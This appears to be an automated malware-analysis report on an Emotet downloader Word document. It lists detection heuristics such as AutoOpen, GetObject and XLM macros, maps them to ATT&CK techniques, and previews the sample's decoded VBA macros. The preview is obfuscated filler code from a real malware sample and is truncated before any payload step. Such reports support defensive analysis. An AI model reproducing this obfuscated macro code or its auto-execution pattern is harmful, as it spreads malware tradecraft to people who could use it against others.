MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6863643-0', indicating it functions as a downloader. The presence of VBA macros, specifically an AutoOpen macro that calls GetObject, strongly suggests it's designed to execute malicious code. This pattern is characteristic of Emotet, which often uses macro-enabled documents to deliver its payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6863643-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6863643-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70072 bytes |
SHA-256: 1b60808f170b4570d02b602044d7acf19635d814464341de8a327c6001b9c367 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Z_38110"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "b04543"
Function w_71_4_()
G___902 = 463496802 - 300565441
M_67647_ = 275529203 + r7022_6
Select Case t84420
Case 393055823
j26146 = Chr(66268235 * Tan(X7124_))
Y37841 = s0_360_3
Case 728148230
O_341__ = z_46__
o97185 = S20_9_60
Case 237004443
N_7_72 = 750649577
W56770 = H908_8
End Select
j2__70 = 18518068 - 131667192
s8_9_0 = 62015676 + X7__7_96
Select Case w9__11_
Case 497061171
z_09___6 = Chr(488412061 * Tan(f6_2__5))
t4__87 = u813101
Case 672540901
w8_3__ = K__4482
k__16_57 = S90_61
Case 601956749
E052_342 = 857795623
c1__5_ = c990_9
End Select
b3453__ = 104565420 - 775740543
X_4393 = 445355691 + Y___2_65
Select Case Y5_90_
Case 79199700
r__82_ = Chr(941390874 * Tan(T_99_01_))
K769_9 = c4978_38
Case 881299136
p4318_ = t848_6_
W52_0_67 = U_74_888
Case 65364877
v99_835 = 679947712
n95286 = M_842_
End Select
v75_37 = 453532830 - 412301132
U14788_7 = 95796094 + b523053
Select Case l573_93_
Case 953038870
w3473900 = Chr(12276949 * Tan(C1_634))
H43_429 = z5_8857
Case 381220213
w198357 = R87_276
V_6982_0 = Z_5110_7
Case 543573614
U__3_186 = 630158723
l0_235 = o880_01
End Select
q02__62 = 83606640 - 488853547
d12_91 = 143256400 + A_9306
Select Case B9_51_5
Case 683430457
z8__23_ = Chr(796771875 * Tan(b677_6))
G_18481_ = a5_2_733
Case 276270113
W6___193 = k558_77
p44153 = j_58244
Case 700988235
j58707 = 144854371
W8__0_ = W369_89
End Select
s888_31 = 49539378 - 772740888
L13_1440 = 996136666 + u0630712
Select Case v56__62
Case 165732834
F_94_31_ = Chr(634065621 * Tan(k_20_20))
B0145__ = t28__0
Case 74561086
O87474 = Y44157
l7_6_35 = n1___79
Case 728333453
z2_3_32 = 249365808
E80_324 = L2339043
End Select
P44_28_ = 988772114 - 646105999
q_2_32 = 241365347 + o5754_8
Select Case B1577_9
Case 668250859
h273__ = Chr(85106757 * Tan(b90699__))
h2_889__ = S575117
Case 347078999
i39___60 = h___3209
A__1632 = d28_158
Case 562870064
l4228_87 = 706307631
S_790068 = l_4203_
End Select
End Function
Function T__6___(s__083, h562_7_4)
On Error Resume Next
l_8_1_3 = 348603701 - 398410052
s4_662__ = 765062067 + d793_60
Select Case a2_8_062
Case 559876446
G29__6_6 = Chr(142959468 * Tan(Q_4415_1))
D13_667 = u54_57__
Case 470702012
R33__25 = D48_412
S_506_61 = o375835_
Case 835402729
O2_209_8 = 692878783
V_2840 = S_57_6
End Select
P20__23_ = 922571786 - 686756153
a5775934 = 179635042 + i51__6
Select Case z_57_583
Case 927261415
H65___51 = Chr(272938300 * Tan(m8_218_))
S__913 = F_64_46
Case 649192883
N_76_77 = m_517849
m_81__7 = z457_2
Case 470863079
z2431630 = 811410163
l803188_ = a5621876
End Select
M34368 = 572154674 - 867632956
s__2_6 = 598042126 + K_2_9138
Select Case B65_9_9
Case 843314296
H6_6_09 = Chr(853046827 * Tan(I5233725))
J_273_ = I538_80_
Case 14711409
u755_4 = H92043
I564129 = b9898676
Case 338829439
s053686 = 352550132
w6_27797 = t0649309
End Select
Set c____
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.